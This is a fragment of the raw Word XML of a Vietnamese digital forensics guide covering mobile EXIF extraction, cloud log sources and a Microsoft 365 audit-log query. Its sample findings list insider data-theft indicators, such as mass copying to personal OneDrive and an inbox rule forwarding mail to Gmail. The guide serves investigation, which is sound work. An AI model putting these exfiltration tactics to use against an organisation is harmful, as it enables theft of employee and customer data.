          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> /home/the_cyber_bite/cases/CASE001/aleapp_report/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3867BCCD">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ALEAPP có thể phân tích SMS/MMS, cuộc gọi, WhatsApp, lịch sử Chrome và Google Timeline.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="46"/>
    <w:p w14:paraId="0B136F14">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="exif---chứng-cứ-từ-ảnh"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>8.5. EXIF - chứng cứ từ ảnh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273A911C">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65"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>exiftool</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> /home/the_cyber_bite/cases/CASE001/evidence_photo.jpg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="65"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>exiftool</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-csv</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-GPS:all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> /home/the_cyber_bite/cases/CASE001/photos/ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="63"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> gps_data.csv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D73566">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Ví dụ EXIF có thể cho biết tọa độ, độ cao, thời gian tạo, hãng máy, model camera và phiên bản phần mềm. Tuy nhiên, EXIF có thể bị sửa hoặc bị xóa, vì vậy phải tương quan với nguồn khác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D20C48E">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:spacing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Mẹo chuyên viên:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Đặt điện thoại vào túi Faraday ngay khi thu giữ để ngăn remote wipe. Nếu không có túi Faraday, cân nhắc bật airplane mode theo quy trình của đơn vị, nhưng phải ghi nhận mọi thao tác vì thao tác trực tiếp có thể làm thay đổi chứng cứ.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="42"/>
    <w:bookmarkEnd w:id="47"/>
    <w:p w14:paraId="4A2BED8A">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext/>
        <w:pageBreakBefore/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="pháp-chứng-đám-mây"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>9. Pháp chứng đám mây</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F928E8">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i/>
          <w:iCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Thu thập chứng cứ từ AWS, Azure, Microsoft 365, Google Workspace và dịch vụ lưu trữ đám mây.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C35D1D3">
      <w:pPr>
        <w:pStyle w:val="3"/>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Pháp chứng đám mây liên quan đến dữ liệu trên IaaS, PaaS và SaaS. Khó khăn chính gồm chứng cứ phân tán qua nhiều khu vực pháp lý, tài nguyên có tính tạm thời, log có thời gian lưu ngắn và việc thu thập thường phụ thuộc vào API hoặc thủ tục pháp lý với nhà cung cấp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A61B277">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="nguồn-chứng-cứ-theo-nền-tảng"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>9.1. Nguồn chứng cứ theo nền tảng</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="13"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="10" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3146"/>
        <w:gridCol w:w="6900"/>
      </w:tblGrid>
      <w:tr w14:paraId="7C16D6F7">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38C21EE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Nguồn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5D1556B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Giá trị pháp chứng</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7F55C611">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6D368A3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AWS CloudTrail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6C6DE9E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Ghi API call, danh tính người gọi, IP, thời gian và tham số.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="25AEEE47">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6A81FA6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AWS VPC Flow Logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4A8C6DE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Metadata luồng mạng nội bộ và Internet trong AWS.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="042FC1D3">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2ADC2FC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AWS S3 Access Logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1AA93D5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Truy cập object: đọc, ghi, xóa và danh tính thực hiện.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="57B4CA0F">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36ABD37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AWS GuardDuty Findings</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="56550BF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Phát hiện tự động như cryptomining, credential theft và C2.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="45BD133B">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17FABD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Azure Activity Log</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="303D131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Tạo/xóa tài nguyên, thay đổi cấu hình VM và thao tác quản trị.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1946DDC0">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23F5427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Azure Sign-In Logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4122AF3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Đăng nhập người dùng và service principal, IP và thiết bị.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5A517284">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6BDA4BD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Microsoft Unified Audit Log</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="395CC02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Hoạt động M365 trên Exchange, SharePoint, OneDrive và Teams.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="57292A75">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232A3B3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Google Workspace Audit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="68552B8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Hoạt động Admin, Drive, Gmail, Calendar và Meet.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1CF18AB3">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66DFEAA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GCP Cloud Audit Logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2A1DA84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Admin activity, data access và system event trên GCP.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2EC088EC">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5609178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SaaS Backup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="433D33B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Có thể giữ dữ liệu sau khi dữ liệu gốc trên cloud đã bị xóa.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="49"/>
    </w:tbl>
    <w:p w14:paraId="2DDEF347">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="microsoft-365---unified-audit-log"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>9.2. Microsoft 365 - Unified Audit Log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487D2BCB">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73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Connect-ExchangeOnline </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="63"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>UserPrincipalName admin@company</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="63"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="60"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>com</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Search-UnifiedAuditLog \</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3"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">StartDate </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="51"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>'2026-01-14'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>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3"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">EndDate </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="51"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>'2026-01-15'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>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3"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Operations </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="51"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>'FileAccessed'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="63"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="51"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>'FileCopied'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="63"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="51"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>'FileDownloaded'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="63"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="51"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>'SendEmail'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> \</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3"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">ResultSize </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="45"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>5000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="63"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="60"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Export-Csv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> audit_log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="63"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="60"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>csv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CAEB54">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Một số phát hiện điển hình:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E419D52">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39"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>FileDownloaded: suspect@company.com tải payroll.xlsx từ SharePoint</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FileCopied: 342 tệp được sao chép sang OneDrive cá nhân trong 3 phút</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SearchQueryInitiated: tìm "salary", "personal data", "customer list"</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InboxRuleAdded: chuyển tiếp toàn bộ email sang Gmail bên ngoài</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UserLoggedIn: đăng nhập từ Tor exit node lúc 03:42</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="50"/>
    <w:p w14:paraId="7FCA8B28">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="aws-cloudtrail"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>9.3. AWS CloudTrail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A19A605">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65"/>
